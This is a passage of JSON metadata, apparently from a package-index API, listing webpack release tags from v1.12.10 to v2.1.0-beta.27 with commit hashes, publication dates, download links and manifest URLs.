ts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0/manifests"},{"name":"v2.1.0-beta.27","sha":"adaca2578cc3dcffbb2d0b639cb611a53f6da7c9","kind":"tag","published_at":"2016-11-15T19:00:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27/manifests"},{"name":"v2.1.0-beta.26","sha":"afbdff48ef2d5b304a41e72f4df8d51d629bc96f","kind":"tag","published_at":"2016-11-14T00:07:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26/manifests"},{"name":"v1.13.3","sha":"1a5fd7e8caeef794f67e56d9d734998209b0838c","kind":"commit","published_at":"2016-10-26T14:21:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3/manifests"},{"name":"v2.1.0-beta.25","sha":"3029e5b1b1c486d7b3dd51e753d20bc25ceecd83","kind":"tag","published_at":"2016-09-21T18:31:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25/manifests"},{"name":"v2.1.0-beta.24","sha":"1c4597f1380ff6e5c7bf2f70c997d7ff52773f5b","kind":"tag","published_at":"2016-09-20T19:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24/manifests"},{"name":"v2.1.0-beta.23","sha":"8292d2f6597925d6d37fd78b91f0b5cd3798a362","kind":"tag","published_at":"2016-09-19T23:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23/manifests"},{"name":"v2.1.0-beta.22","sha":"f5d9a0901cb6b0cca8dcdbb5cd5a2d21de03fde1","kind":"tag","published_at":"2016-09-07T10:43:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22/manifests"},{"name":"v1.13.2","sha":"4b20545b375da82aa6418e6d498f01d543110af0","kind":"tag","published_at":"2016-08-18T08:31:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2/manifests"},{"name":"v2.1.0-beta.21","sha":"c7cb6cb9d0d55b9f9185a8e9db02dcf97ac1c0de","kind":"tag","published_at":"2016-08-17T21:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21/manifests"},{"name":"v2.1.0-beta.20","sha":"b3a3ef3d4545fd1ae5e6abd678de96d4ebfcc5de","kind":"tag","published_at":"2016-07-20T22:41:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20/manifests"},{"name":"v2.1.0-beta.19","sha":"21a72529fa6af47185dc14f86b8d8de6dbcb6565","kind":"tag","published_at":"2016-07-17T22:49:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19/manifests"},{"name":"v2.1.0-beta.18","sha":"d826f99e342f7c0ae223a6837d98d2f648780a09","kind":"tag","published_at":"2016-07-15T21:26:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18/manifests"},{"name":"v2.1.0-beta.17","sha":"bc29455e92f4b760db745775a4fca5cde0d01d23","kind":"tag","published_at":"2016-07-13T12:04:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17/manifests"},{"name":"v2.1.0-beta.16","sha":"90d537ef4ce1092f76bd02ee2a75838c67b809fc","kind":"tag","published_at":"2016-07-13T09:11:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16/manifests"},{"name":"v2.1.0-beta.15","sha":"2829516da95a3bb2fe7dde76013f80f0f7e22dbb","kind":"tag","published_at":"2016-06-28T23:23:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15/manifests"},{"name":"v2.1.0-beta.14","sha":"6748dca837b6402f056b6ac94ffc3c99f8a25c36","kind":"tag","published_at":"2016-06-24T00:02:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14/manifests"},{"name":"v2.1.0-beta.13","sha":"36e4fd2348381d578c43abcbd15ef39a78b5bc07","kind":"tag","published_at":"2016-06-07T22:25:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13/manifests"},{"name":"v2.1.0-beta.12","sha":"3580ec93f8ac7b999fc2faa4bccad31fe6ae5331","kind":"tag","published_at":"2016-06-05T21:02:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12/manifests"},{"name":"v2.1.0-beta.11","sha":"0b1f08022681be796612542c7d0d3c736564a4ff","kind":"tag","published_at":"2016-06-05T18:52:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11/manifests"},{"name":"v2.1.0-beta.10","sha":"2343af44bb4314bafc1ba29cd019bc4b28edbcbf","kind":"tag","published_at":"2016-06-05T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10/manifests"},{"name":"v2.1.0-beta.9","sha":"dc3bd055027d8d1ebbb0ebdd07fb73387a0ab6d1","kind":"tag","published_at":"2016-06-04T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9/manifests"},{"name":"v2.1.0-beta.8","sha":"abf0cefd592700a19856c3ef9b6d65f905ec73c1","kind":"tag","published_at":"2016-05-29T18:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8/manifests"},{"name":"v1.13.1","sha":"01ea02a95cf8c446fd1dc9e82fae0febe9332034","kind":"tag","published_at":"2016-05-20T06:48:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1/manifests"},{"name":"v2.1.0-beta.7","sha":"9162f9e6eea62137139f95b8aaedee335c870edd","kind":"tag","published_at":"2016-05-06T22:00:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7/manifests"},{"name":"v2.1.0-beta.6","sha":"ca8b693c2c17bd06778476381fae23b3b21c0475","kind":"tag","published_at":"2016-04-21T23:03:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6/manifests"},{"name":"v1.13.0","sha":"006d59500de0493c4096d5d4cecd64eb12db2b95","kind":"tag","published_at":"2016-04-15T13:18:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0/manifests"},{"name":"v1.12.15","sha":"ee1b8c43b474b22a20bfc25daf0ee153dfb2ef9f","kind":"tag","published_at":"2016-04-10T22:47:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15/manifests"},{"name":"v2.1.0-beta.5","sha":"54405b59b1dd9724e145d4d16726a926042d0e1d","kind":"tag","published_at":"2016-04-10T22:45:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5/manifests"},{"name":"v2.1.0-beta.4","sha":"c5cc1d25a2a4c0fabdec49a86b3bc62a5d637729","kind":"tag","published_at":"2016-02-24T22:58:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4/manifests"},{"name":"v2.1.0-beta.3","sha":"13f8b690f0eb9e6058c10631e01e54fb88cd7143","kind":"tag","published_at":"2016-02-22T22:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3/manifests"},{"name":"v1.12.14","sha":"3ed27836b488401a7e9be2de1491a868a8b6f123","kind":"tag","published_at":"2016-02-22T22:04:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14/manifests"},{"name":"v2.1.0-beta.2","sha":"69d0d2e4cfe9545d530c4e1bcb59ea01969a9908","kind":"tag","published_at":"2016-02-22T14:31:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2/manifests"},{"name":"v2.1.0-beta.1","sha":"fd1e68f5826743b72590e8a97bcfb3d7f78745dd","kind":"tag","published_at":"2016-02-22T12:29:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1/manifests"},{"name":"v2.1.0-beta.0","sha":"52822286a347bf525eeab7f035341fc25e857914","kind":"tag","published_at":"2016-02-22T08:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0/manifests"},{"name":"v1.12.13","sha":"668a5f0bc68cad70c5182ebcab8b3b1a340e038d","kind":"tag","published_at":"2016-02-04T14:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13/manifests"},{"name":"v2.0.7-beta","sha":"432bf35df499e09585c0efeedb3ddbed337d3ed9","kind":"tag","published_at":"2016-02-04T13:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.7-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.7-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.7-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta/manifests"},{"name":"v2.0.6-beta","sha":"71f0945a81e83cc87026d62424f504d00dc6aec3","kind":"tag","published_at":"2016-01-30T12:24:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.6-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.6-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.6-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta/manifests"},{"name":"v2.0.5-beta","sha":"ac45c3c1a4c9b51eceecba79c6ae1a60887368de","kind":"tag","published_at":"2016-01-26T17:20:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.5-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.5-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.5-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta/manifests"},{"name":"v1.12.12","sha":"c0420f1ca8e2a444a5b5192a58d88d8d7d710bb7","kind":"tag","published_at":"2016-01-23T12:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12/manifests"},{"name":"v2.0.4-beta","sha":"bba8afdeef79a7c6e1be6688107fdff3109463bc","kind":"tag","published_at":"2016-01-21T18:19:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.4-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.4-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.4-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta/manifests"},{"name":"v2.0.3-beta","sha":"b7754b645e50608165e0a28ca4735cd0efcfa0d9","kind":"tag","published_at":"2016-01-21T18:16:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.3-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.3-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.3-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta/manifests"},{"name":"v1.12.11","sha":"ab433884f140d694241c54e9c6f9de7f049aec6d","kind":"tag","published_at":"2016-01-11T18:14:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11/manifests"},{"name":"v1.12.10","sha":"66142f2f89868b8e380c4883513cb974680e20e2","kind":"tag","published_at":"2016-01-06T19:29:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10/manifests"},{"name":"v2.0.2-beta","sha":"0915889feb8558a07b053010e56748566e108285","kind":"tag","published_at":"2015-12-22T11:53:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.2-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.2-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.2-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta/manifests"},{"name":"v2.0.1-beta","sha":"11932d75a4c8034e5d8afb50985159d33fdb8ddc","kind":"tag","published_at":"2015-11